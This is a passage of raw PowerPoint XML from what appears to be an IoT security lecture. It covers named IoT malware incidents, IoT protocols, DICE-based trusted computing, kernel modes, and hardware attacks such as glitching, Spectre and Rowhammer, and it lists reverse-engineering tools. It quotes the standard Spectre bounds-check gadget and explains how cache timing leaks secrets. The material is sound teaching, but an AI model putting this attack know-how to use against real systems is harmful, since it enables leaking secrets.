            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IoT devices have GPIO pins that can be programmed.</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156</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27787762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Large, public IoT attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1403532"/>
            <a:ext cx="4800602"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Pre 2016</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DNSChanger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 Moon</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2016</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Mirai</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2017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Hajami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BrickerBot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Persirai</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IoT Reaper aka IoTroop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WannaCry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BlueBorne</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KRACK </a:t>
            </a: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157</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17BDBAA5-02EF-6342-A796-2BDADF528B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366809" y="1403532"/>
            <a:ext cx="4800602" cy="4663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2018</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Spectre (Cortex-M and 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Satori</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TRITON/TRISIS/HatMan</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OMGEE (Device as proxy) </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74012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IoT specific protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377372" y="1625600"/>
            <a:ext cx="11277600" cy="4913313"/>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MQTT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Lightweight pub/sub protocol for sending simple data flows from sensors to applications and middleware.</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CoAP:</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Specialized web transfer protocol for use with constrained nodes and constrained networks.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AMQP</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Message orientated, queuing, routing  (point to point and pub-sub), reliability and security.</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D2D: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Bluetooth</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NFC</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BAN</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Mesh networking</a:t>
            </a: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158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35012631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92" y="151054"/>
            <a:ext cx="11528854" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trusted computing primitives for IoT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516192" y="1875473"/>
            <a:ext cx="11272154"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Take ownership</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Measured boot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Attest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Seal</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Unseal</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See: </a:t>
            </a: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trusted platform</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DICE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127676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1" y="113983"/>
            <a:ext cx="11816357" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modes, interrupts and exceptions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358346" y="1399309"/>
            <a:ext cx="11195220" cy="5156883"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most computers have (at least) two modes:</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Kernel (or supervisor) is a ”privileged” mode</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User mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A program running in kernel mode has access to all of memory, all the I/O devices and all instructions.  The kernel sets up a memory sandbox for user processes which cannot themselves control I/O devices directly.  While there is one kernel, the kernel multiplexes the computer over many user programs (or “processes”).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>User processes can only access the memory mapped for them by the kernel and do not have access to privileged instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>User programs access system services from a kernel through system call interfaces; the user program sets up parameters and “traps” into a service point in the kernel, transitioning into kernel mode.   The kernel services the system call and activates one of the runnable user processes transitioning into user mode. Services include:</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I/O</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Creation or termination of user processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mode transitions (user to kernel) are triggered by system calls, interrupts (including clock interrupts) and exceptions.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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35090526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page10image2008229504">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F23EEAD5-01B7-3646-BF69-DAF819751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646465" y="3121323"/>
            <a:ext cx="2456707" cy="39171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Dice/Riot (Microsoft)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="146098" y="1238295"/>
            <a:ext cx="11577292" cy="4967221"/>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Dominance: unconditional ability to install firmware in some time specified period.</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Latches and Authenticated watchdog timer (AWDT).</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Latch can be enabled but not disabled.  When enabled, it stays enabled till reset.  Example: Embedded multi-media card controller (eMMC) power on write protect.</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AWDT forces a reset.  Interrupts periodically if not serviced in interim.  Service is via cryptographically protected “keep-alive” messages.</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DICE: Device identifier composition number.</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Chip has globally unique secret, K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> which can be used to derive device key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is cryptographic composition of K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and firmware.</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On boot, Dice pre-loader reads  K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and latches it.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changes if firmware changes.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Device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certifies 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(actually, PK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>alias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and pK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Sk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used for Seal/Unseal.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160</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13841849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Hardware/software boundaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1891145"/>
            <a:ext cx="11582400" cy="4647767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Many subtle security issues manifest at the hardware/software boundary. Examples include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Glitching: heat, light, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, over and under-voltage, timing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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Spectre like timing attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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Differential power analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Differential timing analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial"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161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60460751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Spectre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266698" y="1357745"/>
            <a:ext cx="11714018" cy="5181168"/>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Spectre attacks use speculative execution to learn sensitive program values via covert a microarchitectural channels (the cache state).  There are two variants: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Variant 1: Exploiting Conditional Branches.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Variant 2: Exploiting Indirect Branches.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Consider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (x &lt; array1_size)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   y = array2[array1[x] * 4096];</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Assume that the x is attacker-controlled and that array1[x] is a “secret” value.</a:t>
            </a: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Speculative execution bypasses the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> if statement having been conditioned, in previous runs, that the test will pass. Here, the value of array1[x] is scaled so that accesses go to different cache lines to avoid hardware prefetching effects.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When the result of the bounds check is eventually determined, the CPU reverts any changes made to its architectural state. However, changes made to the cache state are not reverted.  In particular, accesses to the array2[y] will be a lot faster if y = array1[x] (as scaled) is in the cache.  This lets us discover y.</a:t>
            </a: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Almost all modern processors (Intel, ARM) are vulnerable.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162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31166774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err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rowhammer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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90945" y="2033752"/>
            <a:ext cx="11457710" cy="4377271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rowhammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is an unintended side effect in some DRAM causing memory cells to leak charge to adjacent cells  changing the contents of adjacent memory rows. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rowhammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> can be used to escalate privilege.  See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for a practical attack.</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Virtually all DRAM manufactured from 2009 - 2011 had this defect (since all major  manufacturers used similar DRAM process technology)</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The problem was particularly acute in client machines which did not employ error correction.</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 patch that increased the DRAM refresh cycle to 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or less decreases the probability of a successful attack at the cost of higher power consumption</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 system level programmer could do nothing to avoid this attack.</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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428047588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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reverse engineering information and tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741405" y="1692911"/>
            <a:ext cx="10865628" cy="4663440"/>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IDA pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> (which we will use)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Qemu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Binwalk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Firmwalker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
